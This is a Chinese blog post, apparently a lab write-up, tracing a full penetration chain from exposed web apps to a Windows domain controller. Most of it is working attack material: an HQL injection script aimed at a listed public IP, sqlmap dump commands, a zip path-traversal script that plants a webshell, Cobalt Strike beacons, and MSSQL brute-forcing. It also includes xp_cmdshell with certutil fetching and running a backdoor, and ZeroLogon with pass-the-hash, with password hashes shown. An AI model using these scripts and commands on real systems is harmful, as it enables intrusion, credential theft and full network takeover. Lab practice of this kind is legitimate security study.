外网打点到内网域

最新推荐文章于 2024-05-18 11:09:56 发布
最新推荐文章于 2024-05-18 11:09:56 发布
阅读量93 收藏
点赞数
分类专栏: 渗透测试 文章标签: 网络安全 java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cardistry12138/article/details/132910078
版权

文章目录

三层内网 外网打点到内网域 sec123

外网打点

端口探测

拿到ip后,首先进行信息收集,masscan扫描开放端口,nmap探测端口服务

masscan -p 1-65535 xxx.xxx.xxx.xxx --rate=500

nmap -sV xxx.xxx.xxx.xxx -sC -p 80,5357,49669,8878,8088,8899,47001,49666,5985,7000 -oN sec-ports

发现存在三个网站8878、8088、8899

网站CMS
http://xxx.xxx.xxx.xxx:8088/login.jspTomExam网络考试中心
http://xxx.xxx.xxx.xxx:8899/Jspxcms演示主站
http://xxx.xxx.xxx.xxx:8878/网上银行

网上银行 代码审计 Hsql注入漏洞

通过搜索,在GitHub上找到相关源码,得到默认账户,普通账号登录成功,管理账号登录失败。

随后发现登录处存在Hsql注入漏洞

使用sqlmap,注入失败

sqlmap -r sql.txt --dbms mysql -v 1

编写HQL注入exp

#coding:utf-8
import requests
password=""
url="http://103.121.93.206:8878/admin/login"
payload="0123456789abcdefghijklmnopqrstuvwxyz"
password=""
for i in range(1,20):
	for j in payload:
		exp = "admin' and(select substring(password,%s,1) from Admin) like '%s'or '1'='" %(i,j)
		print("正在注入")
		data = {"admin.username": exp, "admin.password": 'aaaa', "type": 1}
		req = requests.post(url=url, data=data);
		if "密码不正确" in req.text:
			password+=j
			print(password)
			break
print(password)

获得管理员密码,成功进入后台

但是网站登录后无法进行getshell,也无法进行跨库查询

TomExam网络考试中心 SQL注入

注册用户后登录,一番搜索后发现一处注入点

http://xxx.xxx.xxx.xxx:8088/page.do?action=comm_news&act=list&classid=1

直接复制请求头,放sqlmap直接一把梭

sqlmap -r yh.txt  -v 1 --batch -p classid --dbs
sqlmap -r yh.txt  -v 1 --batch -p classid -D tomexam --tables
sqlmap -r yh.txt  -v 1 --batch -p classid -D tomexam -T tm_admin --dump

得到管理员账号密码,以及全部三个网站的数据数据库数据

得到第三个网站的管理员密码

admin 51c52ae56562d8c538600385909595b009467f0b 9b2b38ad7cb62fd9

编写jspxcms密文加密脚本进行破解

获取的明文是不能直接解密的 jspxcms 登录是sha1(‘明文’,salt)加密

package com.jspxcms.core;

import com.jspxcms.common.security.SHA1CredentialsDigest;
import com.jspxcms.common.util.Encodes;
import java.io.File;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.PrintWriter;
import java.util.Scanner;

public class Testmain {
    public static void main(String[] args)throws Exception {
    byte[] salt = Encodes.decodeHex("9b2b38ad7cb62fd9");
    SHA1CredentialsDigest test = new SHA1CredentialsDigest();
    String fileName = "D:\\csdnpass.txt";
    String fileName2 = "D:\\hashpassword2.txt";
    try (Scanner sc = new Scanner(new FileReader(fileName))) {
        while (sc.hasNextLine()) {
        String line = sc.nextLine();
        String encPass = test.digest(line, salt);
        File f = new File(fileName2);
        FileWriter fw = new FileWriter(f, true);
        PrintWriter pw = new PrintWriter(fw);
        pw.println(line + " " + encPass);
        pw.close();
        }
    }
    }
}

最终在生成的密文中,再进行明文查找

成功得到明文密码

登录jspxcms后台getshell

使用哥斯拉生成一个jsp木马,然后打包成war包

jar -cf god.war god.jsp

制作目录穿越脚本

import zipfile

zip = zipfile.ZipFile("test.zip",'w',zipfile.ZIP_DEFLATED)
with open("god.war","rb") as f:
	data=f.read();
zip.writestr("../../../god.war",data)
zip.close()

登陆后台,在后台找个zip上传,上传后会自动解压到网站目录,tomcat会自动解压改文件

文件路径 http://xxx.xxx.xxx.xxx/god/god.jsp

使用哥斯拉进行连接,成功getshell,系统权限

内网渗透

上线cobalt strike

启动teamsever

./teamserver 192.168.1.128 123456

生成后门 artifact.exe

使用哥斯拉上传到服务器中并运行,成功上线cs

内网横向信息收集

首先查看一下IP

beacon> shell ipconfig

由于使用cs的端口扫描是非常缓慢的,如果还需要对端口进行探测最好在cs上开启代理,再设置proxychains4代理nmap进行内网扫描

在cs中开启socket代理,2333端口

beacon> socket 2333

再编辑 kali上的 /etc/proxychains4.conf文件

vi /etc/proxychains4.conf
socks4 127.0.0.1 2333

先使用fscan扫描该网段

proxychains4 ./fscan_amd64 -h 192.168.59.0/24 -np -no -nopoc

发现存在一台2003,并且拥有两块网卡 192.168.59.131 10.10.10.136

再使用masscan进行端口扫面,得到 445,80,135,8080,53,3306,1433,5900

proxychains4 masscan -p 1-65535 192.168.59.131 --rate=500

最后使用nmap

proxychains4 nmap -sT -Pn 192.168.59.131 -p 445,80,135,8080,53,3306,1433,5900 --open

发现存在SQL server 1433

hydra对内网进行弱口令穷举

使用 hydra 进行爆破

proxychains4 hydra -l sa -P top10000.txt 192.168.59.131 mssql -vV -f

成功得到用户名和密码 sa admin123

mssqlclient 登录执行命令

使用 Impacket 包中的 mssqlclient 进行登录

proxychains4 python mssqlclient.py sa@192.168.59.131

使用 xp_cmdshell 执行cmd,发现执行失败,百度后可以通过以下方式解决

-- 允许配置高级选项
EXEC sp_configure 'show advanced options', 1
GO
-- 重新配置
RECONFIGURE
GO
-- 启用xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1
GO
--重新配置
RECONFIGURE
GO

--执行想要的xp_cmdshell语句
Exec xp_cmdshell 'query user'
GO

执行命令远程下载后门exe,成功上线cs,权限mssql用户

xp_cmdshell certutil -urlcache -split -f http://xxx.xxx.xxx.xxx/artifact.exe c:/windows/temp/artifact.exe
xp_cmdshell c:/windows/temp/artifact.exe

MS16-075 提权winserver2012

使用cs中的脚本,可加载ms16-075提权模块直接进行提权

得到system权限,成功拿下2012

内网域渗透

内网域信息收集

对server2012进行信息收集,包括ip,登录凭据,端口,网络连接等

使用hashdump,得到管理员密码哈希

Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbb228c4d6ceeea0590a5e4a45b1572c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

查看域控信息,得到域控信息 ad01 sec123 ip 10.10.10.139

ZeroLogon CVE-2020-1472 获取域控权限

下载 https://github.com/leitosama/SharpZeroLogon 进行编译执行,测试存在该漏洞

execute-assembly SharpZeroLogon.exe ad01.sec123.cnk

该漏洞可以直接使域控的密码变为空值,设置空密码

beacon> execute-assembly SharpZeroLogon.exe ad01.sec123.cnk -reset
[*] Tasked beacon to run .NET program: SharpZeroLogon.exe ad01.sec123.cnk -reset
[+] host called home, sent: 114775 bytes
[+] received output:
Performing authentication attempts...
================================================================================
=====
[+] received output:
=====================================================================
[+] received output:
=========================================
Success! DC can be fully compromised by a Zerologon attack.
Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0

接着开启server2012的代理,再设置/etc/proxychanis.conf

使用 impacket 工具包 secretsdump 工具dump导出域内所有用户

proxychains4 python3 secretsdump.py sec123/ad01\$@10.10.10.139 -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::

利用导出的ntlm hash使用 wmiexec 工具使用NTLMhash登录域控

proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74 sec123/Administrator@10.10.10.139

恢复密码

导出原sam.save、system.save、security.save文件本地导出hash用于恢复域控密码

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save

下载后记得删除服务器上的这三个文件

使用 secretsdump 对导出下载的sam.save、system.save、security.save文件进行解密,得到原hash

python secretsdump.py-sam sam.save-system system.save-security security.save LOCAL

通过导出的原NTLMhash恢复域控密码

proxychains4 python3 reinstall_original_pw.py ad01 10.10.10.139 3fdfacaab2b49a9c69d9980ff9343b75

再次使用 secretsdump,导出失败,证明密码已恢复,渗透结束

项目总结

  • 加强了各个工具的使用,更加明确的渗透测试的全部流程,从外网打点到内网域

  • 加深了 cobalt strike 的使用,以及和kali的配合交叉渗透

  • 对 Java 需要更深入的学习

  • 灵活使用CVE、各种漏洞

  • 关注最新的漏洞信息

c0rdXy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
上海网网互联网接入用户承诺书.docx
11-12
上海网网互联网接入用户承诺书.docx
三层内网 外网打点内网 sec123 复现
qq_53742230的博客
08-26 3279
本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点,详细介绍外网各种打点方法。jsp 代码审计编写解密脚本frp 端口映射的使用fscan 内网扫描器的使用cobalt strike 的使用hydra 爆破神器的使用1433 MSSQL 爆破MSSQL 执行cmd命令。...
外网打点到渗透内网控 NASA
qq_53742230的博客
08-26 2550
本次项目是一个是模拟渗透测试 电信诈骗网站(我与诈骗不共戴天),境外人员依赖该网站通过优惠卷诱导受害者进行消费,诈骗受害人金钱。在做项目的时候我们可以把我们学到的知识串联起来,并且在做项目的时候我们会遇到各种各样的问题不会像打靶场那样顺利。遇到这些问题我们要试着去解决它,说不定哪天就可能会遇到同样的问题。没有人一出生就是大佬,无非是见的多了就懂了。希望各位能保持一开始的热情,我们顶峰相见。...
模拟实战从外网打点渗透到内网控的笔记
qq_56426046的博客
12-11 1267
在docker如果启动的时候 --privileged=true 是 可以逃逸的。这次模拟实战的项目几乎是第一次做这么完整的项目从外网渗透到内网控,这次渗透过程中学到了很多东西,但很多也是我应该熟练使用的。然后通过任意文件写入getshell,因为重装信息会写到config.php,也就 给了我写马的机会.工具地址:https://github.com/Ridter/noPac。设置 kali 的 /etc/proxychains4.conf 文件。利用任意文件删除漏洞删除install.lock文件。
scaner 从外网内网渗透
qq_53742230的博客
09-05 9615
渗透测试项目从外网内网渗透
C# 公网-网网聊天 ,客户端服务器通讯
02-25
公网-网网 ,UDP 通讯,可群发, 如果是放公网,将服务器放在公网,客户端可在局网!
论文研究-基于向量网的网内拓扑发现 .pdf
08-16
基于向量网的网内拓扑发现,黄照阳,梁满贵,本论文给出基于向量网的新型拓扑收集及路由算法。在向量网中,数据面和控制面分离,其中,最简单的交换设备只具备最基本的数据交
内网渗透思维导图指北
10-04
内网渗透思维导图指北
内网渗透文档过程有截图
07-02
内网渗透文档过程有截图
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
jar包增量更新分析
junlaiyan的专栏
05-16 250
借助jdeps分析出jar包的增量文件
java实现拼图小游戏
monkey108的博客
05-16 614
本文主要提供用java实现的拼图小游戏源代码。
命令执行漏洞(二)
XLbb的博客
05-15 899
POST方法,S2-045-bypass-2漏洞存在!,程序更改为S2-045-bypass-2漏洞测试模式, 响应码: 200。POST方法,S2-046-bypass漏洞存在!POST方法,S2-045-bypass漏洞存在!POST方法,S2-046-1漏洞存在!POST方法,S2-046-2漏洞存在!POST方法,S2-046-3漏洞存在!POST方法,S2-045-1漏洞存在!POST方法,S2-045-3漏洞存在!POST方法,S2-045-2漏洞存在!POST方法,S2-045-4漏洞存在!
c【语言】了解指针,爱上指针(1)
yzqy_的博客
05-16 898
在计算机中,数据是存储在内存中的,cpu从内存中读取数据,为了方便读取数据,内存又被划分为了一个个的内存单元,一个内存单元的大小就是一字节,一字节等于8bit位,我们给内存进行编号,这个编号就是地址,在c语言中给这个地址起了个名字。是的,亲爱的读者你肯定发现了,&a、p和pc输出的地址是一样的,但&a+1与p+1输出的地址是一样的00EFF940,一次都跳过了4字节,而pc+1输出的却是00EFF93D,一次只跳过一个字节。但是硬件与硬件之间是相互独立的,这该如何实现数据传输呢?”答案当然是否定的。
java数据结构与算法(验证二叉搜索树)
磐门的博客
05-17 244
节点返回空为ture,节点的值不在对应数据大小范围内返回false。将验证二叉搜索树计算同样可以转换为相同子问题,所以比较适合用递归。node为root的左节点时,max更新为root.val。node为root的右节点时,min更新为root.val。
Kubernetes 审计日志采集与分析最佳实践
观测云的博客
05-17 1020
​Kubernetes 在 1.7 版本中发布了审计(Audit)日志功能,通过审计日志,我们能够非常清晰的知道 K8S 集群到底发生了什么事情。
java导出excel动态加载多sheet多复杂表头
weixin_43931108的博客
05-14 247
java导出excel动态加载多sheet多复杂表头
解决 SpringBoot 的 Date、LocalDateTime 变成时间戳和数组的问题,创建自定义对象消息转换器
最新发布
shijialeya
05-18 375
解决 SpringBoot 的 Date、LocalDateTime 变成时间戳和数组的问题,创建自定义对象消息转换器进行数据格式化。
iptables 仅允许从内部连接到网192.168.100.0/24
06-03
以下是 iptables 命令配置仅允许从内部连接到网 192.168.100.0/24: ```bash # 允许回环接口 lo 的所有流量通过 iptables -A INPUT -i lo -j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT # 允许内部连接到网 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值